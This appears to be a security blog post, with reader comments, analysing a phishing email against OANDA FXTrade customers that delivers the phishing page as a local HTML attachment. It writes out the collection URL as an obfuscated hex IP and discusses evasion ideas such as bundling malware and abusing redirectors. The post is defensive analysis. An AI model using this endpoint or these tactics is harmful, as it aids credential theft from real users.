Cenzic 232 Patent
Paid Advertising
web application security lab

Phishing Site in Email

I was looking at a phishing email last night for OANDA FXTrade. At first glance I could see something a little different about it. Instead of linking directly to the phishing site in the email, it contained an attachment (an html file) that you are supposed to double click on. The page is a flat HTML page, with nothing of substance on it, other than a form that tries to get you to submit your data to http://0x47f865c1/webview/images/fxtrade.php (which automatically redirects you to the correct website, if you go there directly).

That’s a fairly clever implementation of a phishing email, because the phishing page is actually on your local computer, not on the web. So it’s harder for anti-phishing researchers to find anything of interest on the remote computer, or even verify that it is a phishing site. But I think I must be getting a little jaded because as soon as I saw the html file I was actually disappointed. While clever since the HTML file contains the phishing site, why on earth wouldn’t they put malicious code in it? Think about it, if someone is dumb enough to open a HTML file on their local computer, why wouldn’t you use it to install malware or something equally bad? To me it just seemed like a no-brainer. I suspect these malicious techniques will eventually converge, but for now, I don’t think the phishers understood exactly what power they had.

9 Responses to “Phishing Site in Email”

  1. Robert McMillan Says:

    Maybe they were worried about AV catching the malcode and blocking the phish?

  2. RSnake Says:

    Doubtful, it had links using <script src= in it, but they were all to the real site, eg:
    <script type="text/javascript" src="http://fxtrade.oanda.com/fileadmin/jslib/fxtrade/prototype.js"></script>

  3. thehorse13 Says:

    A lot of times when you see things that appear pretty clever yet pretty stupid at the same time, what you may have is a research phish. I’ve seen several that model after the one you found that later turned into blended threats as you stated.

  4. kuza55 Says:

    Maybe because in IE at least, html files opened from the web are rendered in the context of the domain they were opened from, and most webmail providers are filtering script (though I think they may still let forms through), however this protection doesn’t apply if you save thefie, then open it manually.

    Also, I don’t see how you can call users dumb for downloading and opening html files, I’d rather call the developers who came up with all the dangerous filetypes other than .exe files stupid.

  5. sana Says:

    It seems pretty obvious to me.
    Putting malicious code = AntiVirus alarms = phishing failure

    ;)

  6. RSnake Says:

    @sana - that’s possible since the user does have to somehow download the JavaScript. But as we all know there are hundreds of ways to obfuscate JavaScript that can get past AV filters, so I think that’s a pretty weak reason unless you really have no idea what you’re doing as an attacker.

  7. Skuld Says:

    It might have something to do with zones in ie7. I don’t remember how it worked in ie6 but every time I have to open a local htm file in ie7 that has javascript or uses some activex control it gives a security bar at the top that I have to enable. I know attacks have been done in the past that use social engineering to get people to allow this anyway, but I find most of the people using exploits try to avoid things that requite any user interaction beyond opening it.

  8. RSnake Says:

    @skuld - I doubt that’s the reason, since it already had JS in it, just the valid site’s JS.

  9. MustLive Says:

    Guys.

    Putting the whole phishing site into the email - it’s one attack technique. There is another (which I found this year) - phising site in the link.

    I wrote about it some time ago in my article Cross-Site Scripting attacks via redirectors. With this attack technique you can use redirection services such as TinyURL for phishing and malware spreading.